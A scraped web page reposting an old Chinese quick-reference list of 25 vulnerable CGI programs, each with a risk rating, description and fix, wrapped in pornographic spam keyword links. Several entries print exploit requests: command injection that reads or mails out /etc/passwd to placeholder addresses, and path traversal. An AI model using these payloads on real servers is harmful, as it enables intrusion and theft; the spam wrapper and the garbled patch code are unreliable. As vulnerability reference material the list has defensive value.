国产午夜成人免费看片无遮挡_日本免费xxxx色视频_免费人成网上在线观看_黄网址在线永久免费观看

當前位置:雨林木風下載站 > 技術(shù)開發(fā)教程 > 詳細頁面

CGI安全漏洞資料速查 v1.0(轉(zhuǎn)一)

CGI安全漏洞資料速查 v1.0(轉(zhuǎn)一)

更新時間:2022-05-01 文章作者:未知 信息來源:網(wǎng)絡 閱讀次數(shù):

◆ CGI安全漏洞資料速查 v1.0

日期:2000-8-15

#############################################################################
本文取自一位朋友.這本來不算是什么珍貴的東西,如果你平時注意收集的話,相信很多人都會
有比這份更全面、更好的資料.但由于某些原因.這些資料一直都不肯被公開.但我是一個崇尚完
全自由、完全開放、完全共享的little guys.所以我把這份資料公開了.希望那位朋友不要怪罪 :) 
# 如有任何安全組織或個人愿意無嘗對此文進行長期的、不間斷地維護、更新或更改. 請自行
隨便,不必與我商討.但要求是成果必須完全地向internet公開. 任何行為的私藏都是不受歡
迎的.
# 本文歡迎轉(zhuǎn)摘.但請保持這些聲明。
# 如有任何問題或建議,請mailto: iwillsurewin@163.net
# iwillsurewin 2000.7.28
############################################################################

         
1
類型: 攻擊型
名字: phf
風險等級: 中
描述: 在NCSA 或者 Apache (1.1.1版本以內(nèi))非商業(yè)版本的Web Server中有一段程序util.c,允許黑客以root身份執(zhí)行任何一個指令:
http://www.xxx.com/cgi-bin/phf?Qname=root%0Asome%20command%20here
建議: 
解決方法: 把Apache web server升級到1.1.1以上,或者將NCSA web server升級到最新版本

_________________________________________________________________

2
類型: 攻擊型
名字: wguset.exe
風險等級: 中
描述: 如果您使用NT做為您的WebServer的操作系統(tǒng),而且wguest.exe存在于您的Web可執(zhí)行目錄中的話,入侵者將能利用它閱讀到您的硬盤上所有USR_<hostname>用戶能閱讀的文件
建議: 將wguset.exe從你的Web目錄移走或刪除
解決方法: 將wguset.exe從你的Web目錄移走或刪除

___________________________________________________________________


3
類型: 攻擊型
名字: rguset.exe
風險等級: 中
描述: 如果您使用NT做為您的WebServer的操作系統(tǒng),而且rguest.exe存在于您的Web可執(zhí)行目錄中的話,入侵者將能利用它閱讀到您的硬盤上所有USR_<hostname>用戶能閱讀的文件
建議: 將rguset.exe從你的Web目錄移走或刪除
解決方法: 將rguset.exe從你的Web目錄移走或刪除


_______________________________________________________________________

4
類型: 攻擊型
名字: perl.exe
風險等級: 低
描述: 在cgi-bin執(zhí)行目錄下存在perl.exe,這屬于嚴重的配置錯誤。黑客可以在perl.exe后面加一串指令,利用瀏覽器在server上執(zhí)行任何腳本程序
建議: perl.exe是放在任何帶執(zhí)行權(quán)限的web目錄下都是不安全的
解決方法: 在web目錄下移除perl.exe這個程序.


____________________________________________________________________


5
類型: 攻擊型
名字: shtml.exe
風險等級: 低
描述: 如果您使用Front Page作為您的WebServer,那么入侵者能夠利用IUSR_<lt;hostname>用戶和shtml.exe入侵您的機器,做您不希望的事
建議: 將shtml.exe從你的Web目錄移走或刪除
解決方法: 將shtml.exe從你的Web目錄移走或刪除


___________________________________________________________________


6
類型: 攻擊型
名字: wwwboard.pl
風險等級: 低
描述: wwwboard.pl程序容易引起攻擊者對服務器進行D.O.S攻擊
建議: 如無必要可以刪除該文件
解決方法: 對get_variables的子程序中的下面這段:
if ($FORM{'followup'}) { $followup = "1";
@followup_num = split(/,/,$FORM{'followup'});
$num_followups = @followups = @followup_num;
$last_message = pop(@followups);
$origdate = "$FORM{'origdate'}";
$origname = "$FORM{'origname'}";
$origsubject = "$FORM{'origsubject'}"; }
替換為:
if ($FORM{'followup'}) {
$followup = "1";
@followup_num = split(/,/,$FORM{'followup'});
$num_followups = @followups = @followup_num;
$last_message = pop(@followups);
$origdate = "$FORM{'origdate'}";
$origname = "$FORM{'origname'}";
$origsubject = "$FORM{'origsubject'}";
# WWWBoard Bomb Patch
# Written By: Samuel Sparling sparling@slip.net)
$fn=0;
while($fn < $num_followups)
{
$cur_fup = @followups $fn];
$dfn=0;
foreach $fm(@followups)
{
if(@followups[$dfn] == @followups[$fn] && $dfn != $fn)
{
&error(board_bomb);
}
$dfn++;
}
$fn++;
}
# End WWWBoard Bomb Patch
}

相關(guān)連接: http://hgfr

_________________________________________________________________________

7
類型: 攻擊型
名字: uploader.exe
風險等級: 中
描述: 如果您使用NT作為您的WebServer的操作系統(tǒng),入侵者能夠利用uploader.exe上傳任何文件
建議: 將uploader.exe從你的Web目錄移走或刪除
解決方法: 將uploader.exe從你的Web目錄移走或刪除

________________________________________________________________

8
類型: 攻擊型
名字: bdir.htr
風險等級: 高
描述: 如果您使用NT做為您的WebServer的操作系統(tǒng),而且bdir.htr存在于您的Web可執(zhí)行目錄中的話,入侵者將能利用它在您的服務器上無止境的創(chuàng)建ODBC數(shù)據(jù)庫,并生成一些可執(zhí)行的文件。
建議: 將bdir.htr從你的Web目錄移走或刪除
解決方法: 將bdir.htr從你的Web目錄移走或刪除

__________________________________________________________________

9
類型: 攻擊型
名字: Count.cgi
風險等級: 高
描述: 在/cgi-bin目錄下的Count.cgi程序(wwwcount2.3版本)有一個溢出錯誤,允許入侵者無須登錄而遠程執(zhí)行任何指令.
建議: 如無必要可以刪除該文件
解決方法: 將wwwcount升級到2.4或者以上

_________________________________________________________________

10
類型: 攻擊型
名字: test-cgi
風險等級: 高
描述: test-cgi這個文件可以被入侵者用來瀏覽服務器上的重要信息

建議: 建議審核cgi-bin目錄下的執(zhí)行程序,嚴格控制訪問權(quán)限
解決方法: 刪除test-cgi文件

__________________________________________________________________

11
類型: 攻擊型
名字: nph-test-cgi
風險等級: 高
描述: nph-test-cgi這個文件可以被入侵者用來瀏覽服務器上的重要信息

建議: 建議審核cgi-bin目錄下的執(zhí)行程序,嚴格控制訪問權(quán)限
解決方法: 刪除nph-test-cgi文件

__________________________________________________________________

12
類型: 攻擊型
名字: php.cgi
風險等級: 低
描述: php.cgi程序有較多的漏洞,包括緩存溢出漏洞,還有導致任何系統(tǒng)文件可以被入侵者讀取的漏洞
建議: 建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法: 刪除php.cgi程序是最好的辦法

_________________________________________________________________

13
類型: 攻擊型
名字: handler
風險等級: 低
描述: IRIX 5.3, 6.2, 6.3, 6.4的/cgi-bin/handler程序存在緩存溢出錯誤,允許入侵者在server上遠程執(zhí)行一段程序:
telnet target.machine.com 80
GET /cgi-bin/handler/whatever;cat /etc/passwd| ?data=Download
HTTP/1.0
建議: 建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法: 刪除handler文件

________________________________________________________________


14
類型: 攻擊型
名字: webgais
風險等級: 高
描述: /cgi-bin,目錄下的webgais是GAIS搜索工具的一個接口,它有一個毛病使入侵者可以繞過程序的安全機制,執(zhí)行系統(tǒng)命令:
POST /cgi-bin/webgais HTTP/1.0
Content-length: 85 (replace this with the actual length of the "exploit" line)
telnet target.machine.com 80

query=';mail+you\@your.host</etc/passwd;echo'&output=subject&domain=paragraph
建議: 建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法: 刪除webgais文件

________________________________________________________________

15
類型: 攻擊型
名字: websendmail
風險等級: 高
描述: /cgin-bin目錄下的websendmail程序允許入侵者執(zhí)行一個系統(tǒng)指令:

telnet target.machine.com 80
POST /cgi-bin/websendmail HTTP/1.0
Content-length: xxx (should be replaced with the actual length of the string passed to the server, in this case xxx=90)
receiver=;mail+your_address\@somewhere.org</etc/passwd;&sender=a&rtnaddr=a&subject=a
&content=a
建議: 建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法: 高級用戶:編輯websendmail腳本,過濾特殊字符
一般用戶:刪除websendmail文件

____________________________________________________________________

16
類型: 攻擊型
名字: webdist.cgi
風險等級: 高
描述: 對于Irix6.2和6.3平臺,/cgi-bin目錄下的webdist.cgi有一個弱點允許入侵者無須登錄而在系統(tǒng)上執(zhí)行任何指令:
http://host/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd

建議: 建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法: 刪除/var/www/cgi-bin/webdist.cgi目錄下的webdist.cgi

__________________________________________________________________

17
類型: 攻擊型
名字: faxsurvey
風險等級: 高
描述: 在Linux S.u.S.E上/cgi-bin目錄下的faxsurvey程序允許入侵者無須登錄就能在服務器執(zhí)行指令:
http://joepc.linux.elsewhere.org/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd
建議: 建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法: 刪除/cgi-bin/faxsurvey文件


_______________________________________________________________________


18
類型: 攻擊型
名字: htmlscript
風險等級: 中
描述: 安裝了htmlscript2.99x或者更早版本的服務器,存在一個毛病使入侵者可以查看服務器上的任何文件:
http://www.vulnerable.server.com/cgi-bin/htmlscript?../../../../etc/passwd
建議: 建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法: 刪除/cgi-bin/htmlscript腳本文件,或者將htmlscript升級到3。0以上


__________________________________________________________________________

19
類型: 攻擊型
名字: pfdisplay
風險等級: 中
描述: 在Irix6.4或者更早版本的web服務器上,/cgi-bin/pfdisplay程序允許入侵者非法查看服務器上的文件
建議: 建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法: 刪除/cgi-bin/pfdisplay文件,或者打補丁
補丁可以去sgigate.sgi.com (204.94.209.1) 或者ftp.sgi.com下載:
Filename: README.patch.3018
Algorithm #1 (sum -r): 37955 11 README.patch.3018
Algorithm #2 (sum): 15455 11 README.patch.3018
MD5 checksum: 1169EB51D75E0794C64C2C1FD6211B69

Filename: patchSG0003018
Algorithm #1 (sum -r): 01679 2 patchSG0003018
Algorithm #2 (sum): 12876 2 patchSG0003018
MD5 checksum: BD16A53A0AE693D6E9E276EE066BDBC8

Filename: patchSG0003018.idb
Algorithm #1 (sum -r): 01339 2 patchSG0003018.idb
Algorithm #2 (sum): 251 2 patchSG0003018.idb
MD5 checksum: 1CB16E6A8C50BF17CD02A29C2E4D35EB

Filename: patchSG0003018.performer_tools_man
Algorithm #1 (sum -r): 10201 8 patchSG0003018.performer_tools_man
Algorithm #2 (sum): 3144 8 patchSG0003018.performer_tools_man
MD5 checksum: B6B3D90FAB9B5A342397C3E5AF5A8D29

Filename: patchSG0003018.performer_tools_sw
Algorithm #1 (sum -r): 48474 18 patchSG0003018.performer_tools_sw
Algorithm #2 (sum): 28176 18 patchSG0003018.performer_tools_sw
MD5 checksum: DF4E8ED8326A6A0B39F7B4D67E5FD71F
相關(guān)連接: http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=64


_____________________________________________________________________


20
類型: 攻擊型
名字: www-sql
風險等級: 中
描述: www-sql存在于/cgi-bin/目錄下,這將導致入侵可以越權(quán)訪問被保護的文件
建議: 最好刪除www-sql文件
解決方法: #if PHPFASTCGI
while(FCGI_Accept() >= 0)
{
#endif
s = getenv("REDIRECT_STATUS");
if(!s) {
puts("Content-type: text/plain\r\n\r\nPHP/FI detected an internal error. Please inform sa@hogia.net of what you just did.\n");
exit(1);
}
s = getenv("PATH_TRANSLATED");
相關(guān)連接:

_________________________________________________________________________________


21
類型: 攻擊型
名字: view-source
風險等級: 高
描述: 在cgi-bin目錄下的view-source程序沒有對輸入進行安全檢查,使入侵者可以查看服務器上的任何文件
建議: 建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法: 刪除/cgi-bin目錄下的viewsource程序
相關(guān)連接: http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=64

______________________________________________________________________

22
類型: 攻擊型
名字: campas
風險等級: 高
描述: 在cgi-bin目錄下的campas程序有一個毛病可以使入侵者隨意查看server上的重要文件:
telnet www.xxxx.net 80
Trying 200.xx.xx.xx...
Connected to venus.xxxx.net
Escape character is '^]'.
GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a
建議: 建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法: 刪除/cgi-bin目錄下的campas程序
相關(guān)連接: http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=64


___________________________________________________________________________


23
類型: 攻擊型
名字: aglimpse
風險等級: 高
描述: 在cgi-bin目錄下的aglimpse程序有一個毛病可以使入侵者無須登錄而隨意執(zhí)行任何指令 
建議: 建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法: 刪除/cgi-bin目錄下的aglimpse程序
相關(guān)連接: http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=64


______________________________________________________________________________

24
類型: 攻擊型
名字: AT-admin.cgi
風險等級: 中
描述: 在Excite for Web Servers 1.1上的/cgi-bin/AT-admin.cgi程序,允許普通用戶完全控制整個系統(tǒng)
建議: 建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法: 刪除/cgi-bin目錄下的AT-admin.cgi程序
相關(guān)連接: http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=64


____________________________________________________________________________________

25
類型: 攻擊型
名字: finger
風險等級: 中
描述: 這個位于/cgi-bin下的finger程序,可以查看其它服務器的信息,但是如果將參數(shù)改成本機,本機上的帳號信息將暴露無遺:
/cgi-bin/finger?@localhost
建議: 建議審核cgi-bin目錄,避免有不必要的程序存在
解決方法: 刪除/cgi-bin目錄下的finger程序
相關(guān)連接:


________________________________________________________________________

溫馨提示:喜歡本站的話,請收藏一下本站!

本類教程下載

系統(tǒng)下載排行

国产午夜成人免费看片无遮挡_日本免费xxxx色视频_免费人成网上在线观看_黄网址在线永久免费观看

  • <label id="pxtpz"><meter id="pxtpz"></meter></label>
      1. <span id="pxtpz"><optgroup id="pxtpz"></optgroup></span>

        一区二区三区四区精品在线视频| 欧美日产在线观看| 99精品欧美一区二区三区小说 | 亚洲欧美日韩久久精品| 成人黄色777网| 日韩美女啊v在线免费观看| 91捆绑美女网站| 午夜精品久久一牛影视| 日韩女优电影在线观看| 国产91丝袜在线播放九色| 亚洲欧美区自拍先锋| 91麻豆精品国产| 丁香一区二区三区| 亚洲高清久久久| 日韩精品专区在线| av一区二区三区黑人| 天天色 色综合| 久久精品人人做人人爽人人| 91精彩视频在线| 国产一区二三区| 亚洲一区二区欧美日韩| 精品成人一区二区三区四区| 日本乱码高清不卡字幕| 国产一区二区三区免费看 | 日本不卡一区二区三区| 国产精品人妖ts系列视频| 欧美疯狂性受xxxxx喷水图片| 处破女av一区二区| 日本不卡视频在线| 亚洲男同性恋视频| 国产亚洲欧美色| 91精品国产色综合久久ai换脸| 色综合久久88色综合天天免费| 久久se这里有精品| 婷婷久久综合九色国产成人| 欧美韩国日本综合| 欧美变态凌虐bdsm| 日韩亚洲欧美一区| 欧美日韩国产中文| 欧美综合视频在线观看| www.色精品| 国产99久久久国产精品免费看| 日韩成人午夜精品| 亚洲国产精品精华液网站| 中文字幕永久在线不卡| 2021国产精品久久精品| 日韩一级免费一区| 欧美性xxxxxx少妇| 日本电影欧美片| 91美女片黄在线观看| 国产二区国产一区在线观看| 精品在线一区二区三区| 麻豆国产精品一区二区三区| 美女尤物国产一区| 美女一区二区视频| 久久国产精品色婷婷| 日韩国产一二三区| 免费观看在线色综合| 欧美bbbbb| 国产又黄又大久久| 成人a区在线观看| 91麻豆国产精品久久| 一本色道久久综合精品竹菊| 色94色欧美sute亚洲线路一久| 色综合天天综合网天天看片| 91黄色免费观看| 欧美精品xxxxbbbb| 欧美成人艳星乳罩| 欧美激情一区三区| 亚洲青青青在线视频| 一区二区成人在线| 精品中文av资源站在线观看| 懂色av一区二区夜夜嗨| 在线亚洲一区二区| 在线播放一区二区三区| 久久这里只精品最新地址| 国产女同互慰高潮91漫画| **欧美大码日韩| 舔着乳尖日韩一区| 国产东北露脸精品视频| 91啦中文在线观看| 在线观看日韩电影| 日韩一区二区免费在线电影| 国产亚洲精品精华液| 亚洲视频1区2区| 日韩成人精品视频| jlzzjlzz欧美大全| 欧美精品在线一区二区三区| 久久日韩精品一区二区五区| 国产精品久久久久久久久免费相片| 亚洲国产综合视频在线观看| 国产一区二区美女诱惑| 色域天天综合网| 精品国产乱码久久久久久影片| 日韩伦理电影网| 美女视频黄免费的久久 | 国产精品久久久久久久久免费丝袜 | 日本久久电影网| 日韩欧美精品在线视频| 成人免费一区二区三区视频 | 韩国一区二区视频| 日本高清不卡视频| 久久女同精品一区二区| 亚洲va天堂va国产va久| 成人福利视频在线看| 狠狠色综合播放一区二区| 成人av电影免费在线播放| 亚洲欧美电影院| 日本一区二区三区免费乱视频| 亚洲线精品一区二区三区| 国产一区在线精品| 欧美视频日韩视频| 欧美激情一区二区| 麻豆视频观看网址久久| 色视频成人在线观看免| 国产三级一区二区| 日本一道高清亚洲日美韩| 色天天综合久久久久综合片| 中文字幕欧美日韩一区| 激情综合色综合久久综合| 欧美日韩国产成人在线91| 亚洲人123区| 97超碰欧美中文字幕| 国产精品欧美久久久久一区二区| 狠狠色狠狠色合久久伊人| 欧美一区二区三区视频在线观看 | 亚洲图片欧美视频| 欧美亚洲一区二区三区四区| 亚洲精品成人悠悠色影视| 91小视频在线免费看| 亚洲欧美视频一区| 99久久99久久精品免费观看| ...av二区三区久久精品| 97精品久久久午夜一区二区三区| 国产精品久久夜| 一本久久精品一区二区| 一区二区三区日韩欧美| 欧美午夜精品久久久久久孕妇| 一区二区三区在线观看动漫| 色悠悠久久综合| 午夜精品福利久久久| 538prom精品视频线放| 毛片av中文字幕一区二区| 欧美mv日韩mv国产| 国产成人免费视频网站| 国产精品久久久久精k8| 欧美亚洲尤物久久| 久久福利资源站| 欧美激情一区二区三区不卡 | 777久久久精品| 看电视剧不卡顿的网站| 久久精品免费在线观看| 99久久精品免费看| 亚洲综合在线免费观看| 日韩欧美在线影院| 成人精品高清在线| 亚洲国产日韩综合久久精品| 欧美电影免费观看高清完整版在线观看| 久草这里只有精品视频| 国产精品久久久久久久蜜臀| 欧美精品一级二级三级| 国产精品亚洲专一区二区三区| 成人免费视频在线观看| 欧美一区二区黄| 色一情一伦一子一伦一区| 青青草成人在线观看| 欧美国产日韩a欧美在线观看| 91高清视频免费看| 国产一区二区视频在线| 亚洲午夜成aⅴ人片| 久久午夜免费电影| 在线观看日韩一区| 国产不卡视频在线播放| 香蕉成人啪国产精品视频综合网| www国产亚洲精品久久麻豆| 91蜜桃传媒精品久久久一区二区 | 一区二区不卡在线播放 | 久久婷婷综合激情| 欧美日韩在线播放一区| 成人久久视频在线观看| 日本在线不卡一区| 一区二区三区四区高清精品免费观看 | 亚洲欧美一区二区三区极速播放| 欧美一区二区三区男人的天堂| 97超碰欧美中文字幕| 黄页网站大全一区二区| 亚洲.国产.中文慕字在线| 国产精品高潮久久久久无| 精品国产123| 欧美一级高清片在线观看| 色综合视频一区二区三区高清| 国产一区二区三区在线观看免费视频| 亚洲大片免费看| 亚洲美女在线国产| 国产精品久久久久久久岛一牛影视 | 婷婷综合久久一区二区三区| 亚洲激情网站免费观看| 中文字幕在线观看一区| 日本一区二区动态图| 久久亚洲精品小早川怜子|